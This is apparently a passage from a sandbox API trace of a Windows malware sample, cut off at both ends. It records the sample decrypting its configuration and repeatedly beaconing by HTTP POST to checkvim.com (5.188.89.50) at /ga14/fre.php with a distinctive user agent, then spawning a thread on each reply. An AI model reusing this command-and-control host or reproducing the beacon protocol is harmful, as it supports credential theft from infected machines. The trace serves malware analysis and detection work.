(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0294.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.360] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0294.360] GetProcessHeap () returned 0x840000 [0294.360] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0294.360] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0294.360] GetProcessHeap () returned 0x840000 [0294.360] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0294.360] GetProcessHeap () returned 0x840000 [0294.360] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0294.360] GetProcessHeap () returned 0x840000 [0294.361] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0294.361] GetProcessHeap () returned 0x840000 [0294.361] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0294.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.361] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0294.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.365] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0294.370] GetProcessHeap () returned 0x840000 [0294.370] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0294.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.371] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0294.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.372] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0294.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.372] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.372] GetProcessHeap () returned 0x840000 [0294.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0294.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.373] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0294.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.374] CryptDestroyKey (hKey=0x87e730) returned 1 [0294.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.375] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0294.375] GetProcessHeap () returned 0x840000 [0294.375] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0294.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.375] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0294.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.376] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0294.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.377] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0294.377] GetProcessHeap () returned 0x840000 [0294.377] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0294.377] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0294.378] GetProcessHeap () returned 0x840000 [0294.378] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0294.378] socket (af=2, type=1, protocol=6) returned 0x4ac [0294.378] connect (s=0x4ac, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0294.454] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0294.454] GetProcessHeap () returned 0x840000 [0294.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0294.454] GetProcessHeap () returned 0x840000 [0294.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0294.454] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0294.455] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0294.456] GetProcessHeap () returned 0x840000 [0294.456] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0294.456] GetProcessHeap () returned 0x840000 [0294.456] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0294.456] GetProcessHeap () returned 0x840000 [0294.456] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0294.456] GetProcessHeap () returned 0x840000 [0294.456] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0294.456] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0294.457] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0294.457] GetProcessHeap () returned 0x840000 [0294.457] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0294.457] GetProcessHeap () returned 0x840000 [0294.457] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0294.457] send (s=0x4ac, buf=0x873a58*, len=237, flags=0) returned 237 [0294.458] send (s=0x4ac, buf=0x87eb58*, len=159, flags=0) returned 159 [0294.458] GetProcessHeap () returned 0x840000 [0294.458] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0294.458] recv (in: s=0x4ac, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0294.815] GetProcessHeap () returned 0x840000 [0294.815] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0294.815] GetProcessHeap () returned 0x840000 [0294.815] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0294.816] GetProcessHeap () returned 0x840000 [0294.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0294.816] GetProcessHeap () returned 0x840000 [0294.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0294.816] closesocket (s=0x4ac) returned 0 [0294.818] GetProcessHeap () returned 0x840000 [0294.818] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0294.818] GetProcessHeap () returned 0x840000 [0294.818] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0294.818] GetProcessHeap () returned 0x840000 [0294.818] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0294.818] GetProcessHeap () returned 0x840000 [0294.819] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0294.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x830) returned 0x4ac [0294.822] Sleep (dwMilliseconds=0xea60) [0294.834] GetProcessHeap () returned 0x840000 [0294.834] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0294.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.835] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0294.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.844] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0294.853] GetProcessHeap () returned 0x840000 [0294.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0294.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.854] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0294.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.856] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0294.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.857] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.857] GetProcessHeap () returned 0x840000 [0294.857] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0294.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.858] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0294.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.858] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0294.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.859] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0294.859] GetProcessHeap () returned 0x840000 [0294.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0294.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.860] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0294.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.861] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0294.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.861] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0294.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.862] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0294.862] GetProcessHeap () returned 0x840000 [0294.862] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0294.862] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0294.862] GetProcessHeap () returned 0x840000 [0294.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0294.863] GetProcessHeap () returned 0x840000 [0294.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0294.863] GetProcessHeap () returned 0x840000 [0294.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0294.863] GetProcessHeap () returned 0x840000 [0294.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0294.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.863] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0294.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.868] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0294.873] GetProcessHeap () returned 0x840000 [0294.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0294.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.874] CryptImportKey (in: hProv=0x86fdf8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0294.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.875] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0294.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.875] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.876] GetProcessHeap () returned 0x840000 [0294.876] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0294.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.876] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0294.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.877] CryptDestroyKey (hKey=0x87e970) returned 1 [0294.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.878] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0294.878] GetProcessHeap () returned 0x840000 [0294.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0294.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.879] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0294.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.879] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0294.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.880] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0294.880] GetProcessHeap () returned 0x840000 [0294.880] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0294.880] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0294.899] GetProcessHeap () returned 0x840000 [0294.899] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0294.899] socket (af=2, type=1, protocol=6) returned 0x4b0 [0294.899] connect (s=0x4b0, name=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0295.002] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0295.003] GetProcessHeap () returned 0x840000 [0295.003] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0295.003] GetProcessHeap () returned 0x840000 [0295.003] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0295.003] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0295.004] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0295.004] GetProcessHeap () returned 0x840000 [0295.004] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0295.004] GetProcessHeap () returned 0x840000 [0295.004] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0295.004] GetProcessHeap () returned 0x840000 [0295.004] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0295.005] GetProcessHeap () returned 0x840000 [0295.005] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0295.005] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0295.006] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0295.006] GetProcessHeap () returned 0x840000 [0295.006] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0295.006] GetProcessHeap () returned 0x840000 [0295.006] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0295.006] send (s=0x4b0, buf=0x873a58*, len=237, flags=0) returned 237 [0295.006] send (s=0x4b0, buf=0x87eb58*, len=159, flags=0) returned 159 [0295.006] GetProcessHeap () returned 0x840000 [0295.006] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0295.006] recv (in: s=0x4b0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0295.382] GetProcessHeap () returned 0x840000 [0295.382] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0295.382] GetProcessHeap () returned 0x840000 [0295.382] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0295.382] GetProcessHeap () returned 0x840000 [0295.382] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0295.382] GetProcessHeap () returned 0x840000 [0295.382] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0295.382] closesocket (s=0x4b0) returned 0 [0295.383] GetProcessHeap () returned 0x840000 [0295.383] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0295.383] GetProcessHeap () returned 0x840000 [0295.383] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0295.383] GetProcessHeap () returned 0x840000 [0295.383] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0295.383] GetProcessHeap () returned 0x840000 [0295.383] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0295.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x10b4) returned 0x4b0 [0295.385] Sleep (dwMilliseconds=0xea60) [0295.388] GetProcessHeap () returned 0x840000 [0295.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0295.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.390] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0295.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.397] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0295.404] GetProcessHeap () returned 0x840000 [0295.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0295.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.406] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0295.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.407] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0295.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.408] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.408] GetProcessHeap () returned 0x840000 [0295.408] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0295.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.415] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0295.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.417] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0295.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.418] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0295.418] GetProcessHeap () returned 0x840000 [0295.418] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0295.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.419] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.420] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.421] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.422] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.422] GetProcessHeap () returned 0x840000 [0295.422] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0295.422] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0295.422] GetProcessHeap () returned 0x840000 [0295.422] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0295.422] GetProcessHeap () returned 0x840000 [0295.422] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0295.423] GetProcessHeap () returned 0x840000 [0295.423] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0295.423] GetProcessHeap () returned 0x840000 [0295.423] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 